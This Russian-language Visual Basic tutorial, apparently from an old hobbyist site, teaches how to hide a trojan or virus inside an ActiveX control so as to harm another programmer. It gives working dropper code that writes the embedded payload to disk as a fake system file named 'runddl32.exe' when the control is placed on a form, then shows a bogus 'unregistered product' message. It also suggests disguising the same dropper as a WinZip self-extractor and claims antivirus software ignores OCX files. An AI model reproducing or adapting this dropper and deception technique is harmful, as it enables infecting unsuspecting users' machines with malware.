Программирование на Visual Basic

Впихиваем троян (или вирь) в ActiveX

Что это такое…
Сегодня поговорим о том, как впихнуть троян или вирус в ActiveX контрол. Все преимущества налицо: главное - ни одному ламеру и в голову не придёт, что в контроле может быть вирь и формат OCX усыпит бдительность "жертвы". Также ни один антивирус пока не проверяет OCX, а если и проверит, то никаких "злобных" программ не найдёт, т. к. в файле OCX программа хранится в изменённом виде.

Что это значит…
Ну, вот представим, что вас довёл ламер-программист, и вы решили ему навредить. Но раз он программист, то и посылать ему обыкновенные EXE трояны тоже почти не имеет смысла - уж программеры знают, как это делается.

А теперь впихнём троян в ActiveX и пошлём ему с крутым описанием. Он установит себе контрол и стоит ему нарисовать его на форме, как в его компьютер "врежется" ваш троянский конь, а контрол сообщит о том, что продукт надо зарегистрировать и завершит свою работу. Но всякие сомнения всё-таки могут вкрасться в голову ламеру так, что лучше всё-таки впаривать троян или вирус в работающий контрол.

Троян или вирус…
О том, как написать вирус или крутой троян, который узнает все пароли на компьютере (включая Dial Up) и который вышлет всё вам на e-mail без всяких дополнительных файлов, я расскажу в следующий раз, а сейчас послушайте, как впихнуть троян в ActiveX.

Исходник или готовый…
Если вы не умеете писать трояны, то дождитесь следующей статьи и воспользуйтесь готовым. Например, можно взять знаменитый "Смерть Ламера" и настроить его, а потом уже вставить в ActiveX. Если же у вас есть готовый исходник, то лучше использовать его.

Как это будет…
Сначала создадим новый ActiveX Control проект. Теперь берём троян (или вирь) и вставляем в проект в RES-файл. Думаю, вы знаете, как это сделать. Ну, ладно опишу.

Если у вас не загружен менеджер RES-файлов, то идите в меню Дополнения (Add-ins), а потом нажмите на Менеджер дополнений (Add-in Manager, кажется). В открывшемся окне найдите и выберите VB Resource Editor и внизу поставьте флажки на Загрузить/Выгрузить (Loaded, кажется) и Загрузить при старте (Startup).

Теперь у вас на стандартной панели (там, где кнопки Open, Save и др.) появится ещё одна зелёная кнопочка. И будет появляться при каждом запуске (пока не уберёте галочку) VB.

Нажмите на эту кнопку и должно появиться окно Resource Editor"а. Там кликните кнопку Add Custom Resource… и в открывшемся диалоговом окне выберите настроенный под ваши нужды троян. Нажмите Открыть. В списке должен появиться выбранный вами файл под номером 101. Теперь ОБЯЗАТЕЛЬНО нажимаем Save (сначала в окне Resource Editor"а, а потом в окне всего проекта).

Программируем…
Ну наконец переходим к процессу программирования.
Значит пишем:
      Private Sub UserControl_Show()
То есть все действия произойдут тогда, когда контрол нарисуют на форме, или когда загрузят форму с нарисованным на ней контролом.
      Dim ResFile() As Byte
Это мы объявили необходимую переменную. Там будет программа-троян.
      Open "C:/Windows/System/runddl32.exe" For Binary Access Write As #1
Здесь указали путь, куда наш троян будет записан. Измените путь, если хотите.
      ResFile = LoadResData(101, "Custom")
Приравниваем переменной содержание RES-файла под меткой 101 (такой номер дался программе при записи в RES, если вы не забыли). Если у вас не 101, то поменяйте на нужное.
      Put #1, , ResFile
Ну, вот самое главное - записываем наш троян в файл.
      Close #1
Обязательно закрываем.
      MsgBox "Контрол незарегистрирован и не будет работать корректно. Пожалуйста, зарегистрируйте эту копию продукта", vbExclamation, "Warning"
Тут мы сообщили об ошибке. Сообщение как вы понимаете, может быть любым.
      UserControl.Enabled = False
      UserControl.Height = 0
      UserControl.Width = 0
Ну, здесь мы просто манипулируем размером контрола.
      End Sub
Конец события (для незнающих)

Это всё?
Да всё! Это очень просто, как всегда.

А где ещё можно такое сделать?
А ещё такой способ записи на диск программы и бинарных файлов подходит для вирусов в авто-распаковывающихся архивах (типа WinZip Self Extractor). То есть вы делаете форму, похожую на форму Self Extractor"а. Затем ставите такую же иконку на EXE. Потом вставляете в RES-файл ваш вирус и пишете этот код. Правда, вместо UserControl_Show, вам нужно использовать событие нажатия на кнопку (кнопка Распаковать) или событие загрузки формы (а может ламер не нажмёт на кнопку!), а при нажатии просто выдать ошибку, хотя все дела (запись Трояна) уже сделаны.

Вот привожу полный предыдущий код без комментариев:
      Private Sub UserControl_Show()
      Dim ResFile() As Byte
      Open "C:/Windows/System/runddl32.exe" For Binary Access Write As #1
      ResFile = LoadResData(101, "Custom")
      Put #1, , ResFile
      Close #1
      MsgBox "Контрол незарегистрирован и не будет работать корректно. Пожалуйста, зарегистрируйте эту копию продукта", vbExclamation, "Warning"
      UserControl.Enabled = False
      UserControl.Height = 0
      UserControl.Width = 0
      End Sub

Коротенькая статья получилась, да и что расписывать-то, всё и так ясно.

Ваш Daniyar Atadjanov. Будут вопросы - пишите, отвечу по мере

Hosted by uCoz